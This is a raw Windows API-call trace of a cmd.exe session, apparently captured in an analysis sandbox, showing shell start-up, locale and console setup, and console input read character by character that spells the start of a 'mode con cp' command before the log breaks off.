_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0033.281] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0033.281] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0033.281] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0033.281] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0033.281] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0033.281] GetProcessHeap () returned 0xc0000 [0033.281] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x5c) returned 0xdb6d0 [0033.281] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f8f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f8f0, lpFilePart=0x31f8d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f8d0*="Desktop") returned 0x25 [0033.281] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0033.281] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f600 | out: lpFindFileData=0x31f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0xdb740 [0033.281] FindClose (in: hFindFile=0xdb740 | out: hFindFile=0xdb740) returned 1 [0033.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f600 | out: lpFindFileData=0x31f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xdb740 [0033.282] FindClose (in: hFindFile=0xdb740 | out: hFindFile=0xdb740) returned 1 [0033.282] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0033.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f600 | out: lpFindFileData=0x31f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x379e4a70, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x379e4a70, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0xdb740 [0033.282] FindClose (in: hFindFile=0xdb740 | out: hFindFile=0xdb740) returned 1 [0033.282] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0033.282] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0033.282] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0033.282] GetProcessHeap () returned 0xc0000 [0033.282] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdac30 | out: hHeap=0xc0000) returned 1 [0033.282] GetEnvironmentStringsW () returned 0xdb740* [0033.282] GetProcessHeap () returned 0xc0000 [0033.282] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xae8) returned 0xdc230 [0033.282] FreeEnvironmentStringsW (penv=0xdb740) returned 1 [0033.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a45c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.282] GetProcessHeap () returned 0xc0000 [0033.282] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdb6d0 | out: hHeap=0xc0000) returned 1 [0033.282] GetProcessHeap () returned 0xc0000 [0033.282] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4016) returned 0xdcd20 [0033.283] GetProcessHeap () returned 0xc0000 [0033.283] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdcd20 | out: hHeap=0xc0000) returned 1 [0033.283] GetConsoleOutputCP () returned 0x1b5 [0033.283] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a45bfe0 | out: lpCPInfo=0x4a45bfe0) returned 1 [0033.283] GetUserDefaultLCID () returned 0x409 [0033.283] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a457b50, cchData=8 | out: lpLCData=":") returned 2 [0033.283] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31fa00, cchData=128 | out: lpLCData="0") returned 2 [0033.283] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31fa00, cchData=128 | out: lpLCData="0") returned 2 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31fa00, cchData=128 | out: lpLCData="1") returned 2 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a46a740, cchData=8 | out: lpLCData="/") returned 2 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a46a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a46a460, cchData=32 | out: lpLCData="Tue") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a46a420, cchData=32 | out: lpLCData="Wed") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a46a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a46a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a46a360, cchData=32 | out: lpLCData="Sat") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a46a700, cchData=32 | out: lpLCData="Sun") returned 4 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a457b40, cchData=8 | out: lpLCData=".") returned 2 [0033.284] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a46a4e0, cchData=8 | out: lpLCData=",") returned 2 [0033.284] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0033.285] GetProcessHeap () returned 0xc0000 [0033.285] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x20c) returned 0xd95c0 [0033.285] GetConsoleTitleW (in: lpConsoleTitle=0xd95c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0033.285] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.285] GetFileType (hFile=0xf4) returned 0x3 [0033.285] BrandingFormatString () returned 0xd97e0 [0033.297] GetVersion () returned 0x1db10106 [0033.297] _vsnwprintf (in: _Buffer=0x31fb70, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x31fb08 | out: _Buffer="6.1.7601") returned 8 [0033.297] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.297] GetFileType (hFile=0xf4) returned 0x3 [0033.297] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a466340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0033.298] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a466340, nSize=0x2000, Arguments=0x31fb10 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0033.298] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x31fa98, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31fa98*=0x24, lpOverlapped=0x0) returned 1 [0033.298] _vsnwprintf (in: _Buffer=0x4a466340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31fb38 | out: _Buffer="\r\n") returned 2 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] GetFileType (hFile=0xf4) returned 0x3 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0033.298] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fb08, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31fb08*=0x2, lpOverlapped=0x0) returned 1 [0033.298] _vsnwprintf (in: _Buffer=0x4a466340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x31fb38 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] GetFileType (hFile=0xf4) returned 0x3 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0033.298] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x31fb08, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31fb08*=0x3f, lpOverlapped=0x0) returned 1 [0033.298] _vsnwprintf (in: _Buffer=0x4a466340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31fb38 | out: _Buffer="\r\n") returned 2 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] GetFileType (hFile=0xf4) returned 0x3 [0033.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0033.298] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fb08, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31fb08*=0x2, lpOverlapped=0x0) returned 1 [0033.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0033.298] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0033.299] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0033.299] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0033.299] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.299] GetFileType (hFile=0xe8) returned 0x3 [0033.299] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0033.299] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x31f960 | out: TokenHandle=0x31f960*=0x0) returned 0xc000007c [0033.299] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x31f960 | out: TokenHandle=0x31f960*=0x50) returned 0x0 [0033.299] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x31f970, TokenInformationLength=0x4, ReturnLength=0x31f978 | out: TokenInformation=0x31f970, ReturnLength=0x31f978) returned 0x0 [0033.299] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x31f978, TokenInformationLength=0x4, ReturnLength=0x31f970 | out: TokenInformation=0x31f978, ReturnLength=0x31f970) returned 0x0 [0033.299] NtClose (Handle=0x50) returned 0x0 [0033.299] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x31f940, nSize=0x0, Arguments=0x31f948 | out: lpBuffer="\x97e0\x0d") returned 0xf [0033.299] GetProcessHeap () returned 0xc0000 [0033.299] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xc1ab0 [0033.299] GetConsoleTitleW (in: lpConsoleTitle=0x31f990, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0033.299] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0033.300] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0033.300] GetProcessHeap () returned 0xc0000 [0033.300] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xc1ab0 | out: hHeap=0xc0000) returned 1 [0033.300] LocalFree (hMem=0xd97e0) returned 0x0 [0033.300] GetProcessHeap () returned 0xc0000 [0033.300] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdaa10 | out: hHeap=0xc0000) returned 1 [0033.301] _vsnwprintf (in: _Buffer=0x4a466340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f678 | out: _Buffer="\r\n") returned 2 [0033.301] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.301] GetFileType (hFile=0xf4) returned 0x3 [0033.301] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.301] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0033.301] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f648, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f648*=0x2, lpOverlapped=0x0) returned 1 [0033.301] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0033.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a45c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0033.301] _vsnwprintf (in: _Buffer=0x4a44eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f688 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0033.301] _vsnwprintf (in: _Buffer=0x4a44ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f688 | out: _Buffer=">") returned 1 [0033.301] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.301] GetFileType (hFile=0xf4) returned 0x3 [0033.301] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.301] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0033.301] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x31f678, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f678*=0x26, lpOverlapped=0x0) returned 1 [0033.301] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.301] GetFileType (hFile=0xe8) returned 0x3 [0033.301] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.301] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.301] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0033.302] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.302] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.302] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0033.302] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.302] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.302] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0033.302] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.302] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.302] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.303] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0033.303] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.303] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 